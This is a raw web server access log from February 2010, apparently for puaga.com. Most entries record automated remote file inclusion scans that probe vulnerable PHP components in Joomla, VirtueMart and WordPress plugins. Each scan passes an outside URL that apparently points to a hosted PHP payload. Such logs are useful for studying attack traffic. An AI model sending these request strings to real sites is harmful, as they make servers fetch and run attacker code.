69.13.69.245 - - [11/Feb/2010:08:32:45 -0800] "GET /logs/access_100118.log//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:32:45 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:33:13 -0800] "GET /logs/access_100111.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:33:22 -0800] "GET /logs/access_100125.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:33:32 -0800] "GET /logs/access_100130.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:33:33 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:33:33 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:33:35 -0800] "GET ///amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:33:35 -0800] "GET /logs////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:33:35 -0800] "GET /logs/access_100114.log%20%20////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:08:33:41 -0800] "GET /logs/access_100126.log//components/com_mosmedia/media.tab.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:34:03 -0800] "GET /logs/access_100121.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:08:34:57 -0800] "GET /logs/access_100127.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.19.182.40 - - [11/Feb/2010:08:35:00 -0800] "GET /orange_g/forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/orange_g/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "puaga.com"
84.19.182.40 - - [11/Feb/2010:08:35:01 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:17 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:17 -0800] "GET /logs/access_100131.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:17 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:18 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:18 -0800] "GET /logs/access_100131.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:18 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:25 -0800] "GET /logs/access_100131.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:25 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:35:25 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:08:36:03 -0800] "GET /logs///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:08:36:03 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:08:36:03 -0800] "GET //vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:36:28 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:36:28 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:36:33 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:37:58 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:37:58 -0800] "GET /logs/access_100131.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:37:59 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:39:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:39:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:39:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:39:08 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:39:12 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:39:25 -0800] "GET /logs////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:39:26 -0800] "GET ///amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:39:26 -0800] "GET /logs/access_100114.log%20%20////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:39:48 -0800] "GET ///amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:39:48 -0800] "GET /logs////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:39:48 -0800] "GET /logs/access_100114.log%20%20////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:40:15 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:40:23 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:40:26 -0800] "GET /logs/access_100125.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:40:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:40:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:40:58 -0800] "GET /logs/access_100110.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:41:56 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:42:11 -0800] "GET /logs/access_100123.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:43:02 -0800] "GET /logs/access_100114.log////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:43:13 -0800] "GET /logs/access_100201.log////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:43:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:43:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:43:33 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:08:43:57 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [11/Feb/2010:08:44:38 -0800] "GET /logs/access_100105.log///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:44:59 -0800] "GET /logs/access_100114.log////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:45:10 -0800] "GET /logs/access_100201.log////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:45:14 -0800] "GET /logs/access_100129.log//errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:45:54 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:45:54 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:46:10 -0800] "GET /logs/access_100111.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:46:19 -0800] "GET /logs/access_100125.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.108.142.138 - - [11/Feb/2010:08:47:03 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.atesh.info"
95.108.142.138 - - [11/Feb/2010:08:47:09 -0800] "GET / HTTP/1.1" 200 13514 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.atesh.info"
95.108.142.138 - - [11/Feb/2010:08:47:11 -0800] "GET / HTTP/1.1" 200 13514 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.atesh.info"
87.106.241.31 - - [11/Feb/2010:08:47:42 -0800] "GET /logs/access_100114.log////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:47:48 -0800] "GET /logs/access_100111.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [11/Feb/2010:08:47:56 -0800] "GET /logs/access_100201.log////amboard?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:47:57 -0800] "GET /logs/access_100125.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:48:18 -0800] "GET //wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:48:18 -0800] "GET /logs/access_100128.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:48:18 -0800] "GET /logs///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:48:35 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:48:35 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:48:35 -0800] "GET /logs/access_100115.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:48:42 -0800] "GET /logs/access_100208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:49:09 -0800] "GET //wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:49:09 -0800] "GET /logs/access_100128.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:49:09 -0800] "GET /logs///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:49:29 -0800] "GET /logs/access_100115.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:49:29 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:49:29 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:49:31 -0800] "GET /logs/access_100208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:49:33 -0800] "GET /logs/access_100111.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:49:34 -0800] "GET /logs/access_100125.log//akocomments.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:08 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:08 -0800] "GET /logs/access_100127.log//com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:08 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:08:50:16 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:08:50:16 -0800] "GET /logs/access_100103.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:08:50:16 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:33 -0800] "GET /logs/access_100111.log//com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:34 -0800] "GET /logs/access_100127.log//com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:34 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:34 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:08:50:42 -0800] "GET /logs/access_100125.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:50:48 -0800] "GET /logs/access_100117.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:51:02 -0800] "GET /logs/access_100117.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:51:15 -0800] "GET /logs/access_100111.log//com_virtuemart/export.php?mosConfig.absolute.path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:08:51:56 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:08:51:56 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:08:51:56 -0800] "GET /logs/access_100103.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:02 -0800] "GET /logs/access_100131.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:02 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
